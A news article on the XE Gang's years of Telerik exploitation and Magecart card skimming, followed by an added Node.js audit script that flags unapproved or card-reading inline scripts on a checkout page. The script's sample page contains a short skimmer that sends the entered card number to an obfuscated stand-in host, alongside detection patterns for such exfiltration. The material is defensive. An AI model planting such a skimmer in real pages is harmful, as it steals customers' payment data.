Last Updated on 09/12/2021 by Nidhi Khandelwal
The ‘XE Gang,’ a relatively unknown group of Vietnamese hackers, has been tied to eight years of commercial hacking and credit card skimming.
Threat actors are suspected of stealing thousands of credit cards per day, primarily from restaurants, non-profit organizations, art galleries, and travel websites.
The actors compromise externally facing services using publicly available exploits, most notably for Telerik UI vulnerabilities, and then install malware that steals passwords and payment information.
The group’s operations were first detailed in a 2020 Malwarebytes report, but Volexity provided a more in-depth study of recent compromises ascribed to them yesterday.
More details are now available.
Volexity was able to trace the XE Group’s infrastructure over the past three years and publish all technical information and IOCs on GitHub.
Thanks to a popular technique for loading malicious JavaScript snippets, the researchers were able to locate a large number of compromised sites all carrying the same skimmer.
“The code used to load the malicious JavaScript from this page exposes an unusual technique: the attacker uses the JavaScript keyword ‘object’ to populate the domain value,” the researchers wrote in their Volexity study.
These are known as “Magecart” attacks, which occur when a threat actor hacks an eCommerce site and inserts malicious JavaScript that captures customer and payment information as it is submitted. The stolen data is subsequently sent to a remote site, where the attackers can collect it.
The long-term success of these attacks depends on how long the skimmer can remain on a website without being detected by security software.
When a sample of this skimmer is uploaded to VirusTotal, it receives a 0/57 detection score, showing that the group’s JavaScript is highly effective at evading antivirus detection.
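Since signature-based antivirus scored 0/57 against this skimmer, a site owner is better served by inventorying what actually runs on the checkout page. The following is an added example, not code from the article or from Volexity: a small Node.js audit that flags the two artifacts a Magecart injection leaves behind, an external script from an origin the shop never approved and inline JavaScript that reads payment fields and also sends data over the network. The allowlisted origins and the sample checkout page are constructed for the example.

```javascript
// Added example (not Volexity's or the article's code): audit the <script> tags
// of a checkout page snapshot for signs of an injected Magecart skimmer.
// Run with: node audit.js
const ALLOWED_ORIGINS = new Set([ // assumption: the shop's known script hosts
  "https://shop.example",
  "https://cdn.shop.example",
]);

// Network primitives a skimmer needs to exfiltrate, and field names it targets.
const NETWORK_CALLS = /\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/;
const PAYMENT_FIELDS = /\b(card|cc|cvv|cvc|expir|pan)\b/i;

// Pull every <script> tag out of raw HTML; sufficient for a static page snapshot.
function extractScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    out.push(src ? { src: src[1] } : { inline: m[2].trim() });
  }
  return out;
}

// Returns one finding per suspicious script; an empty array means the page is clean.
function auditScripts(html, allowed = ALLOWED_ORIGINS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      let origin;
      try { origin = new URL(s.src, "https://shop.example").origin; } catch { origin = s.src; }
      if (!allowed.has(origin)) findings.push({ kind: "unapproved-origin", src: s.src });
    } else if (NETWORK_CALLS.test(s.inline) && PAYMENT_FIELDS.test(s.inline)) {
      findings.push({ kind: "inline-exfil-pattern", snippet: s.inline.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed checkout page: one legitimate script plus two injected ones. The
// inline script assembles its exfiltration host at runtime, as skimmers often do.
const SAMPLE_HTML = `
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://static-assets.example-cdn.net/jquery.min.js"></script>
<script>
document.forms[0].addEventListener("submit", function () {
  var pan = document.getElementById("card-number").value;
  fetch("https://" + ["static","example-cdn","net"].join(".") + "/c", {method:"POST", body: pan});
});
</script>`;

console.log(auditScripts(SAMPLE_HTML));
```

Running the audit on every deploy and diffing its output against the previous run turns an unexplained new origin or inline network call into an alert, regardless of whether any antivirus engine recognizes the script.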